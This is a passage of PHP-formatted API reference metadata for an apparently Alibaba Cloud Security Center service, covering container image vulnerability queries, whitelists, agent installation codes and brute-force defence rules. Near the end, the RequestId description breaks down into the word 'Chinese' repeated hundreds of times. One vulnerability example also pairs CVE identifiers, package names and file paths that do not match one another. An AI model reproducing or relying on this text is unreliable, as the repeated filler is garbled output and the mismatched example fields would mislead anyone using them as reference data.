'registry.cn-wulanchabu.aliyuncs.com/sas_test/huxin-test-001:nuxeo6-conta****'."\n", 'title' => ''], 'ContainerId' => ['description' => 'The ID of the container.', 'type' => 'string', 'example' => '04d20e98c8e2c93b7b864372084320a15a58c8671e53c972ce3a71d9c163****'."\n", 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the server.', 'type' => 'string', 'example' => '1.2.XX.XX', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the server.', 'type' => 'string', 'example' => '172.19.XX.XX', 'title' => ''], 'InstanceName' => ['description' => 'The name of the asset instance.', 'type' => 'string', 'example' => 'testInstance', 'title' => ''], 'TargetId' => ['description' => 'The ID of the scan target.', 'type' => 'string', 'example' => 'm-bp17m0pc0xprzbwo****', 'title' => ''], 'TargetName' => ['description' => 'The name of the scan target.', 'type' => 'string', 'example' => 'source-test-obj-XM0Ma', 'title' => ''], 'MaliciousSource' => ['description' => 'The source of the malicious file. Valid values:'."\n" ."\n" .'- **agentless**: agentless detection'."\n" .'- **image**: image'."\n" .'- **container**: container.', 'type' => 'string', 'example' => 'agentless', 'title' => ''], 'TargetType' => ['description' => 'The object type of the scan target. Valid values:'."\n" ."\n" .'- **ECS_IMAGE**: image.'."\n" .'- **ECS_SNAPSHOT**: snapshot.', 'type' => 'string', 'example' => 'ECS_IMAGE', 'title' => ''], 'ScanTime' => ['description' => 'The timestamp of the scan. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1649814050000', 'title' => ''], 'RuleTag' => ['description' => 'The vulnerability tag. Valid values:'."\n" ."\n" .' - **AI**: vulnerability related to AI components.', 'type' => 'string', 'example' => 'AI', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'View container image vulnerability list', 'description' => 'To view the latest container image vulnerability information, call the [PublicCreateImageScanTask](~~PublicCreateImageScanTask~~) operation to create an image scan task first, wait 1 to 5 minutes, and then call this operation to view the container image vulnerability list.', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageVulList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeImageVulList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"CurrentPage\\": 1,\\n \\"RequestId\\": \\"D6B20156-49B0-5CF0-B14D-7ECA4B50DAAB\\",\\n \\"PageSize\\": 10,\\n \\"TotalCount\\": 1,\\n \\"VulRecords\\": [\\n {\\n \\"CanUpdate\\": true,\\n \\"Type\\": \\"cve\\",\\n \\"Status\\": 1,\\n \\"ModifyTs\\": 1580808765000,\\n \\"ImageDigest\\": \\"8f0fbdb41d3d1ade4ffdf21558443f4c03342010563bb8c43ccc09594d507012\\",\\n \\"PrimaryId\\": 782661,\\n \\"Tag\\": \\"oval\\",\\n \\"RepoNamespace\\": \\"default\\",\\n \\"RepoName\\": \\"varnish\\",\\n \\"Related\\": \\"CVE-2019-9893\\",\\n \\"FirstTs\\": 1620752053000,\\n \\"LastTs\\": 1631779996000,\\n \\"Necessity\\": \\"asap\\",\\n \\"Uuid\\": \\"0004a32a0305a7f6ab5ff9600d47****\\",\\n \\"AliasName\\": \\"CVE-2018-25010:libwebp up to 1.0.0 ApplyFilter out-of-bounds read\\",\\n \\"Name\\": \\"debian:10:CVE-2019-9893\\",\\n \\"Layers\\": [\\n \\"[\\\\\\"null\\\\\\"]\\"\\n ],\\n \\"ExtendContentJson\\": {\\n \\"OsRelease\\": \\"10.9\\",\\n \\"Os\\": \\"debian\\",\\n \\"RpmEntityList\\": [\\n {\\n \\"MatchList\\": [\\n \\"[\\\\\\"libstdc++ version less than 8.5.0-4.el8_5\\\\\\"]\\"\\n ],\\n \\"Layer\\": \\"b1f5b9420803ad0657cf21566e3e20acc08581e7f22991249ef3aa80b8b1c587\\",\\n \\"FullVersion\\": \\"2.3.3-4\\",\\n \\"Version\\": \\"2.3.3-4\\",\\n \\"MatchDetail\\": \\"libseccomp2 version less than equals 2.3.3-4\\",\\n \\"Path\\": \\"/usr/lib64/libssh2.so.1\\",\\n \\"Name\\": \\"libseccomp2\\",\\n \\"UpdateCmd\\": \\"apt-get update && apt-get install libseccomp2 --only-upgrade\\"\\n }\\n ]\\n },\\n \\"CanFix\\": \\"yes\\",\\n \\"ClusterId\\": \\"c08d5fc1a329a4b88950a253d082f1****\\\\n\\",\\n \\"ClusterName\\": \\"docker-law\\\\n\\",\\n \\"Pod\\": \\"22222-7xsqq\\\\n\\",\\n \\"Namespace\\": \\"test-002\\\\n\\",\\n \\"Image\\": \\"registry.cn-wulanchabu.aliyuncs.com/sas_test/huxin-test-001:nuxeo6-conta****\\\\n\\",\\n \\"ContainerId\\": \\"04d20e98c8e2c93b7b864372084320a15a58c8671e53c972ce3a71d9c163****\\\\n\\",\\n \\"InternetIp\\": \\"1.2.XX.XX\\",\\n \\"IntranetIp\\": \\"172.19.XX.XX\\",\\n \\"InstanceName\\": \\"testInstance\\",\\n \\"TargetId\\": \\"m-bp17m0pc0xprzbwo****\\",\\n \\"TargetName\\": \\"source-test-obj-XM0Ma\\",\\n \\"MaliciousSource\\": \\"agentless\\",\\n \\"TargetType\\": \\"ECS_IMAGE\\",\\n \\"ScanTime\\": 1649814050000,\\n \\"RuleTag\\": \\"AI\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeImageVulWhiteList' => [ 'summary' => 'Queries the image vulnerability whitelist.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'abilityTreeCode' => '161674', 'abilityTreeNodes' => ['FEATUREsasU76LC1'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'AliasName', 'in' => 'query', 'schema' => ['description' => 'The alias of the vulnerability to query.', 'type' => 'string', 'required' => false, 'example' => 'CVE-2007-5686:rpath_linux', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page in a paged query. Paging is used to display results.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page in a paged query. Paging is used to display results. Default value: 20.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'Source', 'in' => 'query', 'schema' => ['description' => 'The source of the whitelist. Valid values:'."\n" .'- **image**: image'."\n" .'- **agentless**: agentless.', 'type' => 'string', 'required' => false, 'example' => 'image', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'ImageVulWhitelist' => [ 'description' => 'The image vulnerability whitelist.', 'type' => 'array', 'items' => [ 'description' => 'The image vulnerability whitelist.', 'type' => 'object', 'properties' => [ 'Name' => ['description' => 'The name of the vulnerability.', 'type' => 'string', 'example' => 'scan:AVD-2022-953356', 'title' => ''], 'AliasName' => ['description' => 'The alias of the vulnerability in the vulnerability advisory.', 'type' => 'string', 'example' => 'CVE-2019-19906:in_sasl_add_string', 'title' => ''], 'Target' => ['description' => 'The operation target. This parameter is in JSON format and contains the following fields:'."\n" ."\n" .'- **type**: the target type. The value is fixed as repo.'."\n" .'- **target**: the target content. Format: namespace/image repository.', 'type' => 'string', 'example' => '{\\"type\\":\\"repo\\",\\"target\\":[\\"sas_test/script_0209\\",\\"sas_test/script\\"]}', 'title' => ''], 'Reason' => ['description' => 'The reason for adding the vulnerability to the whitelist.', 'type' => 'string', 'example' => 'already config in another way', 'title' => ''], 'Type' => ['description' => 'The type of the vulnerability. Valid values:'."\n" .'- **cve**: system vulnerability'."\n" .'- **sca**: application vulnerability.', 'type' => 'string', 'example' => 'sca', 'title' => ''], 'Id' => ['description' => 'The primary key ID of the vulnerability.', 'type' => 'integer', 'format' => 'int64', 'example' => '34032043', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The paging information for the paged query.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in the paged query. Paging starts from page 1.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page in the paged query. Paging is used to display results.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'- **true**: The request was successful.'."\n" .'- **false**: The request failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The message returned for the request.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '911025D0-3D1E-5213-A18A-37EA0C92****', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code of the request.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], 'TimeCost' => ['description' => 'The time consumed to process the request, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query image vulnerability whitelist', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageVulWhiteList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:DescribeImageVulWhiteList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"ImageVulWhitelist\\": [\\n {\\n \\"Name\\": \\"scan:AVD-2022-953356\\",\\n \\"AliasName\\": \\"CVE-2019-19906:in_sasl_add_string\\",\\n \\"Target\\": \\"{\\\\\\\\\\\\\\"type\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"repo\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"target\\\\\\\\\\\\\\":[\\\\\\\\\\\\\\"sas_test/script_0209\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"sas_test/script\\\\\\\\\\\\\\"]}\\",\\n \\"Reason\\": \\"already config in another way\\",\\n \\"Type\\": \\"sca\\",\\n \\"Id\\": 34032043\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 100,\\n \\"Count\\": 20\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"911025D0-3D1E-5213-A18A-37EA0C92****\\",\\n \\"HttpStatusCode\\": 200,\\n \\"TimeCost\\": 1\\n}","type":"json"}]', ], 'DescribeInstallCaptcha' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92120', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '192.168.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for requests and responses. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese.'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Deadline', 'in' => 'query', 'schema' => ['description' => 'The expiration time of the installation verification code. If this parameter is left empty, only valid installation verification codes are queried.'."\n" .'> The installation verification code can be used only within its validity period. An expired installation verification code cannot be used to install the Security Center Agent.', 'type' => 'string', 'required' => false, 'example' => '2020-10-11 16:26:22', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'Deadline' => ['description' => 'The expiration date of the installation verification code.'."\n" .'> The installation verification code can be used only within its validity period. An expired installation verification code cannot be used.', 'type' => 'string', 'example' => '2020-10-10 16:06:38', 'title' => ''], 'RequestId' => ['description' => 'The unique identifier that Alibaba Cloud generated for the request.', 'type' => 'string', 'example' => '4E5BFDCF-B9DD-430D-9DA4-151BCB581C9D', 'title' => ''], 'CaptchaCode' => ['description' => 'The installation verification code for manually installing the Security Center Agent.', 'type' => 'string', 'example' => 'M1HH**', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve the installation verification code for manual agent installation', 'summary' => 'Retrieves the installation verification code for manually installing the Agent.', 'requestParamsDescription' => "\n", 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeInstallCaptcha'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeInstallCaptcha', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Deadline\\": \\"2020-10-10 16:06:38\\",\\n \\"RequestId\\": \\"4E5BFDCF-B9DD-430D-9DA4-151BCB581C9D\\",\\n \\"CaptchaCode\\": \\"M1HH**\\"\\n}","type":"json"}]', ], 'DescribeInstallCode' => [ 'summary' => 'Retrieves the installation verification key for the agent client installation command.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique identifier for each request. You can use the request ID to troubleshoot issues.', 'type' => 'string', 'example' => 'A4EB8B1C-1DEC-5E18-BCD0-D1BBB393****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve installation key', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeInstallCode'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeInstallCode', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Code\\": \\"200\\",\\n \\"RequestId\\": \\"A4EB8B1C-1DEC-5E18-BCD0-D1BBB393****\\"\\n}","type":"json"}]', ], 'DescribeInstallCodes' => [ 'summary' => 'Queries the list of commands for manually installing the Security Center agent.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92122', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], ], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'C0D6119F-92EE-1276-B8B6-C81A7F9D57F5', 'title' => ''], 'InstallCodes' => [ 'description' => 'The installation command information.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'OnlyImage' => ['description' => 'Indicates whether the installation is image-based. Valid values:'."\n" ."\n" .'- **true**: Yes.'."\n" .'- **false**: No.', 'type' => 'boolean', 'example' => 'false', 'title' => ''], 'CaptchaCode' => ['description' => 'The installation verification code for manually installing the Security Center agent.', 'type' => 'string', 'example' => '15v02r', 'title' => ''], 'GroupId' => ['description' => 'The ID of the server group to which the server belongs.', 'type' => 'integer', 'format' => 'int64', 'example' => '9165712', 'title' => ''], 'GroupName' => ['description' => 'The name of the server group to which the server belongs.', 'type' => 'string', 'example' => 'default', 'title' => ''], 'ExpiredDate' => ['description' => 'The timestamp when the installation command expires. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1637810007000', 'title' => ''], 'VendorName' => ['description' => 'The name of the server vendor.', 'type' => 'string', 'example' => 'ALIYUN', 'title' => ''], 'Os' => ['description' => 'The operating system of the server. Valid values:'."\n" .'- **linux**: Linux.'."\n" .'- **windows**: Windows.', 'type' => 'string', 'example' => 'linux', 'title' => ''], 'ProxyCluster' => ['description' => 'The name of the proxy cluster.', 'type' => 'string', 'example' => 'proxy_test', 'title' => ''], 'PrivateLinkEndpointId' => ['description' => 'The Alibaba Cloud PrivateLink endpoint ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '123', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query the list of commands for manually installing the security center agent', 'description' => 'This operation queries the commands for manually installing the Security Center agent on servers. The query results include installation verification codes and server-related information. If you need to manually install the Security Center agent on a server, call this operation to obtain the manual installation commands.'."\n" ."\n" .'### Rate limit'."\n" .'The single-user queries per second (QPS) limit for this operation is 10. If the number of calls exceeds the limit, throttling is triggered, which may affect your business. Call this operation as needed.', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeInstallCodes'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeInstallCodes', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"C0D6119F-92EE-1276-B8B6-C81A7F9D57F5\\",\\n \\"InstallCodes\\": [\\n {\\n \\"OnlyImage\\": false,\\n \\"CaptchaCode\\": \\"15v02r\\",\\n \\"GroupId\\": 9165712,\\n \\"GroupName\\": \\"default\\",\\n \\"ExpiredDate\\": 1637810007000,\\n \\"VendorName\\": \\"ALIYUN\\",\\n \\"Os\\": \\"linux\\",\\n \\"ProxyCluster\\": \\"proxy_test\\",\\n \\"PrivateLinkEndpointId\\": 123\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeInstanceAntiBruteForceRules' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '115.238.XX.XX', 'title' => ''], ], [ 'name' => 'UuidList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of server UUIDs to query.'."\n" .'> You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain the UUIDs of servers.', 'type' => 'array', 'items' => ['description' => 'The UUID of the server to query.'."\n" .'> You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain the UUIDs of servers.', 'type' => 'string', 'required' => false, 'example' => '4fe8e1cd-3c37-4851-b9de-124da32c****', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the page to return. Default value: **1**, which indicates that the first page is returned.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of assets to display per page in a paging query. Default value: **10000**, which indicates that up to 10,000 entries of asset information are returned per page.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. The ID is a unique identifier that Alibaba Cloud generates for the request and can be used to troubleshoot issues.', 'type' => 'string', 'example' => '97286A-4A6B-4A4-95FA-EC7E3E2451', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of servers on which brute-force attacks defense rules take effect.', 'type' => 'integer', 'format' => 'int32', 'example' => '4', 'title' => ''], 'Count' => ['description' => 'The number of servers on which brute-force attacks defense rules take effect on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '4', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Rules' => [ 'description' => 'The list of servers on which brute-force attacks defense rules take effect.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The UUID of the server on which the brute-force attacks defense rule takes effect.', 'type' => 'string', 'example' => '4fe8e1cd-3c37-4851-b9de-124da32c****', 'title' => ''], 'Name' => ['description' => 'The name of the brute-force attacks defense rule.', 'type' => 'string', 'example' => 'TestRule', 'title' => ''], 'Id' => ['description' => 'The ID of the brute-force attacks defense rule.', 'type' => 'integer', 'format' => 'int64', 'example' => '215779601', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query servers on which brute-force attacks defense rules take effect', 'summary' => 'Queries information about servers on which brute-force attacks defense rules take effect.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeInstanceAntiBruteForceRules'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeInstanceAntiBruteForceRules', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"97286A-4A6B-4A4-95FA-EC7E3E2451\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 4,\\n \\"Count\\": 4\\n },\\n \\"Rules\\": [\\n {\\n \\"Uuid\\": \\"4fe8e1cd-3c37-4851-b9de-124da32c****\\",\\n \\"Name\\": \\"TestRule\\",\\n \\"Id\\": 215779601\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeInstanceRebootStatus' => [ 'summary' => 'Queries the restart status of instances.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'Uuids', 'in' => 'query', 'schema' => ['description' => 'The UUIDs of the servers to query for restart status. Separate multiple UUIDs with commas (,).', 'type' => 'string', 'required' => true, 'example' => 'd77f7802-4f0a-4221-ab02-4d999e****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'RequestId' => ['description' => 'The request ID. This is a unique identifier generated by Alibaba Cloud for the request and can be used to troubleshoot issues. Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese 